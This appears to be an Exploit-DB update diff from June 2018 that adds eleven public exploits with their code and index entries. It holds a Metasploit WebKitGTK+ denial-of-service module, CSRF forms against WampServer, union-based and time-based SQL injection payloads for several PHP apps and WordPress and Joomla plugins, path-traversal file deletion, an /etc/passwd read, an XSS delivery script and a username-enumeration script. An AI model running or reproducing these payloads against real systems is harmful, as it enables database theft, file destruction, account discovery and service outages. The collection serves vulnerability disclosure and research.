DB: 2018-06-12

11 changes to exploits/shellcodes

WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS

WampServer 3.0.6 - Cross-Site Request Forgery
Schools Alert Management Script - SQL Injection
WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
Event Manager Admin panel - 'events_new.php' SQL injection
Joomla! Component EkRishta 2.10 - 'cid' SQL Injection
Schools Alert Management Script - Arbitrary File Deletion
userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting
userSpice 4.3.24 - Username Enumeration
Schools Alert Management Script - 'get_sec.php' SQL Injection
Schools Alert Management Script - Arbitrary File Read

exploits/linux/dos/44876.rb

@@ -0,0 +1,64 @@
+##
+# Title: WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS
+# Author: Dhiraj Mishra
+# Date: 2018-06-11
+# CVE: 2018-11646
+#
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => "WebKitGTK+ WebKitFaviconDatabase DoS",
+        'Description'    => %q(
+          This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
+          If successful, it could lead to application crash, resulting in denial of service.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => [
+          'Dhiraj Mishra', # Original discovery, disclosure
+          'Hardik Mehta',  # Original discovery, disclosure
+          'Zubin Devnani', # Original discovery, disclosure
+          'Manuel Caballero' #JS Code
+        ],
+        'References' => [
+          ['EDB', '44842'],
+          ['CVE', '2018-11646'],
+          ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],
+          ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']
+        ],
+        'DisclosureDate' => 'Jun 03 2018',
+        'Actions'        => [[ 'WebServer' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'DefaultAction'  => 'WebServer'
+      )
+    )
+  end
+
+  def run
+    exploit # start http server
+  end
+
+  def setup
+    @html = <<-JS
+<script type="text/javascript">
+ win = window.open("WIN", "WIN");
+ window.open("http://example.com/", "WIN");
+ win.document.execCommand('stop');
+ win.document.write("HelloWorld");
+ win.document.close();
+</script>
+    JS
+  end
+
+  def on_request_uri(cli, _request)
+    print_status('Sending response')
+    send_response(cli, @html)
+  end
+end

exploits/php/webapps/44851.txt

@@ -0,0 +1,38 @@
+# Exploit Title: WampServer 3.0.6 - Cross-Site Request Forgery
+# Date: 2018-06-11
+# Exploit Author: L0RD
+# Software Link: https://ufile.io/gpqh9
+# Vendor Homepage: http://www.wampserver.com/en/
+# Version: 3.0.6 - 64bit
+# Tested on: Win 10
+
+# Description :
+# An issue was discovered in WampServer 3.0.6 which allows a remote
+# attacker to force any victim to add or delete virtual hosts.
+
+# POC 1 :
+# Add virtual hosts exploit :
+
+<html>
+ <head>
+   <title>Exploit</title>
+ </head>
+<body>
+  <form action="http://localhost/add_vhost.php?lang=english" method="post">
+    <input type="hidden" name="vh_name" value="lord" />
+    <input type="hidden" name="vh_ip" value="" />
+    <input type="hidden" name="vh_folder" value="C:\wamp64\www"/>
+    <input type="submit" name="submit" value="test">
+  </form>
+ </body>
+</html>
+
+# POC 2 :
+# Delete virtual hosts exploit :
+# Use this exploit to delete specific vhost :
+# Exploit :
+
+<form method='post' action="http://localhost/add_vhost.php?lang=english">
+    <input type='hidden' name='virtual_del[]' value='Set your vhost name here' checked="true" />
+    <input type="submit" name="vhostdelete" value="test">
+</form>

exploits/php/webapps/44866.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Schools Alert Management Script - SQL Injection
+# Date: 2018-06-07
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Category: Web Application
+# Exploit Author: M3@Pandas
+# Web: https://github.com/unh3x/just4cve/issues/2
+# Tested on: Linux Mint
+# CVE: CVE-2018-12055
+
+# Vulnerable cgi:
+contact_us.php faq.php about.php photo_gallery.php privacy.php
+
+# Proof of Concept：
+
+POST http://localhost/[PATH]/photo_gallery.php DATA xxx'/**/union/**/all/**/select/**/1,user(),3,4#

exploits/php/webapps/44867.txt

@@ -0,0 +1,36 @@
+# Title: WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection
+# Author: Manuel García Cárdenas
+# Date: 2018-05-10
+# Software: WordPress Plugin Pie Register 3.0.9
+# CVE: CVE-2018-10969
+
+# I. VULNERABILITY
+# WordPress Plugin Pie Register 3.0.9 - Blind SQL Injection
+
+# II. BACKGROUND
+# Pie-Register is a quick and easy way to brand your Registration Pages on
+# WordPress sites.
+
+# III. DESCRIPTION
+# This bug was found using the portal in the files:
+# /pie-register/classes/invitation_code_pagination.php:    if ( isset(
+# $_GET['order'] ) && $_GET['order'] )
+# /pie-register/classes/invitation_code_pagination.php:    $order =
+# $_GET['order'];
+# And when the query is executed, the parameter "order" it is not sanitized.
+# /pie-register/classes/invitation_code_pagination.php:    $this->order = esc_sql( $order );
+
+# IV. PROOF OF CONCEPT
+# The following URL have been confirmed to all suffer from Time Based SQL Injection.
+
+GET
+/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc
+(original)
+
+GET
+/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(2)))a)
+HTTP/1.1(2 seconds of response)
+
+GET
+/wordpress/wp-admin/admin.php?page=pie-invitation-codes&orderby=name&order=desc%2c(select*from(select(sleep(30)))a)
+HTTP/1.1(30 seconds of response)

exploits/php/webapps/44868.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Event Manager PHP Script Admin panel - 'events_new.php' SQL injection
+# Date: 2018-06-10
+# Exploit Author: telahdihapus
+# Vendor Homepage: https://codecanyon.net/user/ezcode
+# Software Link: https://codecanyon.net/item/eventmanager-php-script-admin-panel/21280741
+# Tested on: windows 10
+
+# 1. description :
+# Insert data in events_new.php do not use escape string function, 
+# so attacker can put qoute character and inject query in insert data.
+
+# 2. POC :
+login in admin page http://victim.com/cms/, or you can register admin if you not have, register at http://victim.com/cms/register.
+
+go to http://victim.com/cms/events_new.php
+
+add new title, add some value and press "new type" button. you can see success notice.
+
+now, add payload to value.
+
+example payload = a'), (120, (select version()))-- -
+
+120 is id, you can put your cursor in delete button, to see id, and you can prediction next id.

exploits/php/webapps/44869.txt

@@ -0,0 +1,24 @@
+# # # #
+# Exploit Title: Joomla! Component Ek Rishta 2.10 - SQL Injection 
+# Dork: N/A
+# Date: 08.06.2018
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Software Link: https://extensions.joomla.org/extension/ek-rishta/
+# Version: 2.10
+# Tested on: WiN7_x64/
+# video : https://youtu.be/UWGFVUU9AU0
+# # # #
+# Exploit Author: 41!kh4224rDz
+# # # #
+# ------------------------------SQL
+Injection----------------------------------------
+# POC:
+# Parameter : user_detail&cid
+# Payload : 1%' AND SLEEP(10)%23
+#
+# 1)
+#
+http://localhost/[PATH]/index.php?option=com_ekrishta&view=user_detail&cid=941%%27%20AND%20SLEEP(10)%23
+#
+#
+# # # #

exploits/php/webapps/44870.txt

@@ -0,0 +1,15 @@
+# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion
+# Date: 2018-06-07
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Category: Web Application
+# Exploit Author: M3@Pandas
+# Web: https://github.com/unh3x/just4cve/issues/6
+# Tested on: Linux Mint
+# CVE: CVE-2018-12053
+
+# Proof of Concept：
+
+/delete_img.php?img=./uploads/school_logos/1528_x1.php
+# notice: There is a risk of file deletion，you'd better test it combined with file upload vulnerability.
+# Attackers can delete any file through parameter 'img' with '../' .

exploits/php/webapps/44871.pl

@@ -0,0 +1,46 @@
+# Exploit Title: userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting
+# Date: 2018-06-10
+# Author: Dolev Farhi
+# Vendor or Software Link: www.userspice.com
+# Version: 4.3.24
+# Tested on: Ubuntu
+# Payload will get executed when admin visits the audit log page
+
+#!/usr/bin/perl
+
+use strict;
+use LWP::UserAgent;
+
+print "UserSpice 4.3.24 X-Forwarded-For XSS PoC\n";
+
+if ($#ARGV != 0 ) {
+	print "usage: $0 <address> \n";
+	exit 1;
+}
+
+my $server   = $ARGV[0] . "/users/cron/backup.php?from=users/cron_manager.php/";
+my $ua = LWP::UserAgent->new;
+my $req = HTTP::Request->new(GET => 'http://' . $server);
+
+print "Enter payload: ";
+
+my $xff = <STDIN>;
+chomp $xff;
+
+if ($xff eq "")
+{
+ print "Empty payload \n";
+ exit 1;
+}
+
+$req->header('X-Forwarded-For' => $xff);
+
+my $resp = $ua->request($req);
+if ($resp->is_success) {
+    print "[OK] Sent payload: $xff\n";
+    exit 0;
+}
+else {
+    print "[Error]: code: ", $resp->code, $resp->message, "\n";
+    exit 1;
+}

exploits/php/webapps/44872.py

@@ -0,0 +1,38 @@
+# Exploit Title: userSpice 4.3.24 - Username Enumeration
+# Date: 2018-06-10
+# Author: Dolev Farhi
+# Vendor or Software Link: www.userspice.com
+# Version: 4.3.24
+# Tested on: Ubuntu
+
+import sys
+import os.path
+import requests
+
+print("[+] UserSpice 4.3.24 Username Enumeration")
+
+if len(sys.argv) != 3:
+	print 'Usage:', sys.argv[0], 'ip.add.re.ss', 'usernames.txt'
+	sys.exit(1)
+
+if not os.path.exists(sys.argv[2]):
+	print('usernames.txt does not exist')
+	sys.exit(1)
+
+headers = {
+	'Origin':'http://' + sys.argv[1],
+	'X-Requested-With':'XMLHttpRequest'
+}
+
+print('Checking usernames...')
+
+f = open(sys.argv[2], 'r')
+
+for user in f:
+	user = user.strip()
+	req = requests.post('http://'+sys.argv[1]+'/users/parsers/existingUsernameCheck.php', headers=headers ,
+		 																				  data={"username":user})
+	if 'taken' in req.text:
+		print('[FOUND] ' + user)
+	else:
+		print('[NOT FOUND] ' + user)

exploits/php/webapps/44873.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Schools Alert Management Script - 'get_sec.php' SQL Injection
+# Date: 2018-06-07
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Category: Web Application
+# Exploit Author: M3@Pandas
+# Web: https://github.com/unh3x/just4cve/issues/3
+# Tested on: Linux Mint
+# CVE: CVE-2018-12052
+
+# Proof of Concept：
+
+/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23

exploits/php/webapps/44874.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Schools Alert Management Script - Arbitrary File Read
+# Date: 2018-06-07
+# Vendor Homepage: https://www.phpscriptsmall.com/
+# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
+# Category: Web Application
+# Exploit Author: M3@Pandas
+# Web: https://github.com/unh3x/just4cve/issues/4
+# Tested on: Linux Mint
+# CVE: CVE-2018-12054
+
+# Proof of Concept：
+
+/img.php?f=/./etc/./passwd

files_exploits.csv

@@ -5991,6 +5991,7 @@ id,file,description,date,author,type,platform,port
 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
 44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,
+44876,exploits/linux/dos/44876.rb,"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' DoS",2018-06-11,"Dhiraj Mishra",dos,linux,
 44857,exploits/linux/dos/44857.html,"Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service",2018-06-08,rop,dos,linux,
 44859,exploits/multiple/dos/44859.html,"WebKit - WebAssembly Compilation Info Leak",2018-06-08,"Google Security Research",dos,multiple,
 44860,exploits/multiple/dos/44860.js,"Google Chrome - Integer Overflow when Processing WebAssembly Locals",2018-06-08,"Google Security Research",dos,multiple,
@@ -39522,8 +39523,18 @@ id,file,description,date,author,type,platform,port
 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
 44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
 44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
+44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
 44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
 44855,exploits/php/webapps/44855.py,"Monstra CMS < 3.0.4 - Cross-Site Scripting",2018-06-07,DEEPIN2,webapps,php,
 44864,exploits/hardware/webapps/44864.py,"XiongMai uc-httpd 1.0.0 - Buffer Overflow",2018-06-08,"Andrew Watson",webapps,hardware,
 44865,exploits/linux/webapps/44865.txt,"Splunk < 7.0.1 - Information Disclosure",2018-06-08,KoF2002,webapps,linux,
+44866,exploits/php/webapps/44866.txt,"Schools Alert Management Script - SQL Injection",2018-06-11,M3@Pandas,webapps,php,
+44867,exploits/php/webapps/44867.txt,"WordPress Plugin Pie Register < 3.0.9 - Blind SQL Injection",2018-06-11,"Manuel García Cárdenas",webapps,php,
+44868,exploits/php/webapps/44868.txt,"Event Manager Admin panel - 'events_new.php' SQL injection",2018-06-11,telahdihapus,webapps,php,
+44869,exploits/php/webapps/44869.txt,"Joomla! Component EkRishta 2.10 - 'cid' SQL Injection",2018-06-11,41!kh4224rDz,webapps,php,
+44870,exploits/php/webapps/44870.txt,"Schools Alert Management Script - Arbitrary File Deletion",2018-06-11,M3@Pandas,webapps,php,
+44871,exploits/php/webapps/44871.pl,"userSpice 4.3.24 - 'X-Forwarded-For' Cross-Site Scripting",2018-06-11,"Dolev Farhi",webapps,php,
+44872,exploits/php/webapps/44872.py,"userSpice 4.3.24 - Username Enumeration",2018-06-11,"Dolev Farhi",webapps,php,
+44873,exploits/php/webapps/44873.txt,"Schools Alert Management Script - 'get_sec.php' SQL Injection",2018-06-11,M3@Pandas,webapps,php,
+44874,exploits/php/webapps/44874.txt,"Schools Alert Management Script - Arbitrary File Read",2018-06-11,M3@Pandas,webapps,php,